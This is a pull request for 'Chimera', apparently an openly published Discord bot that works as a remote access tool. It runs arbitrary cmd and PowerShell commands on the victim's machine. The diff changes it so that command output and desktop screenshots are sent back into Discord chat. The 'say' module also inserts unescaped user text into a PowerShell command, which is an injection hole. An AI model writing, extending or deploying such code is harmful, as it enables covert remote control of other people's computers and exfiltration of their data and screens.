### PR TITLE
Display cmd and powershell output in discord chat. 

### DIFF
--- a/chimera.py
+++ b/chimera.py
@@ -19,10 +19,10 @@ client = Bot(description="A remote administration tool for discord", command_pre
 
 # Enter Discord Bot Token & Channel ID:
 BOT_TOKEN = 'Enter Token Here'
-CHANNEL_ID = 'Enter Channel ID here'
 
 #Used by !echo(set) and !cmd/!powershell(get)
 display_output = True
+
 
 @client.event
 async def on_ready():
@@ -144,8 +144,8 @@ async def logoff(seconds = 0):
 # Description: Takes a screenshot and sends it back
 # Usage: !screenshot or !screenshot secondsToScreenshot
 # Dependencies: time, os, mss
-@client.command()
-async def screenshot(seconds = 0):
+@client.command(pass_context = True)
+async def screenshot(ctx, seconds = 0):
 	if os.path.isfile('screenshot.png'):  # Check if a screenshot.png exists, if yes, delete it so it can be replaced
 		os.remove('screenshot.png')
 	await client.say("Taking a screenshot.")
@@ -153,7 +153,7 @@ async def screenshot(seconds = 0):
 		time.sleep(seconds)
 	with mss() as sct:
 		filename = sct.shot(mon=-1, output='screenshot.png')
-	await client.send_file(client.get_channel(CHANNEL_ID),'screenshot.png')
+	await client.send_file(ctx.message.channel, 'screenshot.png')
 
 
 # Module: say

--- a/chimera.py
+++ b/chimera.py
@@ -18,9 +18,10 @@ from mss import mss
 client = Bot(description="A remote administration tool for discord", command_prefix="!", pm_help = False)
 
 # Enter Discord Bot Token & Channel ID:
-BOT_TOKEN = 'Enter Token Here'
+BOT_TOKEN = 'Enter Token here'
+CHANNEL_ID = 'Enter Channel ID here'
 
-#Used by !echo(set) and !cmd/!powershell(get)
+# Used by !echo(set) and !cmd / !powershell(get)
 display_output = True
 
 

--- a/chimera.py
+++ b/chimera.py
@@ -21,6 +21,9 @@ client = Bot(description="A remote administration tool for discord", command_pre
 BOT_TOKEN = 'Enter Token Here'
 CHANNEL_ID = 'Enter Channel ID here'
 
+#Used by !echo(set) and !cmd/!powershell(get)
+display_output = True
+
 @client.event
 async def on_ready():
 	print('--------')
@@ -46,7 +49,9 @@ async def on_ready():
 @client.command()
 async def cmd(cmnd):
 	await client.say("Executing in command prompt: " + cmnd)
-	os.system(cmnd)
+	cmnd_result = os.popen(cmnd).read()
+	if display_output == True:
+		await client.say(cmnd_result)
 	await asyncio.sleep(3)
 
 
@@ -57,7 +62,9 @@ async def cmd(cmnd):
 @client.command()
 async def powershell(cmnd):
 	await client.say("Executing in powershell: " + cmnd)
-	os.system("powershell {}".format(cmnd))
+	cmnd_result = os.popen("powershell {}".format(cmnd)).read()
+	if display_output == True:
+		await client.say(cmnd_result)
 	await asyncio.sleep(3)
 
 
@@ -158,5 +165,22 @@ async def say(txt):
 	await client.say("Saying: " + txt)
 	os.system("powershell Add-Type -AssemblyName System.Speech; $synth = New-Object -TypeName System.Speech.Synthesis.SpeechSynthesizer; $synth.Speak('" + txt + "')")
 	await asyncio.sleep(3)
+
+	
+# Module: echo
+# Description: Turns command output display to discord chat on and off (works for !cmd and !powershell)
+# Usage: !echo off or !echo on
+# Dependencies: None
+@client.command()
+async def echo(status):
+	global display_output
+	if status == "on":
+		display_output = True
+		await client.say("!cmd and !powershell output will be displayed in chat. ")
+	elif status == "off":
+		display_output = False
+		await client.say("!cmd and !powershell output will be hidden from chat. ")
+	else:
+		await client.say("Parameter of echo can be off or on. ")
 
 client.run(BOT_TOKEN)


### PR DESCRIPTION
#1 
You are now able to call `!echo on` and `!echo off` to activate or deactivate command output display in discord chat. I added the echo module at the bottom of the file and modified cmd and powershell module to integrate the feature. For this to work I had to make a global variable at the top of the file (`display_output`, modified by `echo` module and accessed by `cmd` and `powershell` modules).

I noticed that screenshot required CHANNEL_ID to work, which made the bot send the screenshot on CHANNEL_ID regardless of the channel the actual command was called on. (if you called screenshot in other channel the upload would still be made in CHANNEL_ID). I removed the need for a channel id and now the channel is detected automatically, meaning that the bot will always send the screenshot on the channel you called the command. If it was intended to send on one channel only I'll revert the change or add an option for it.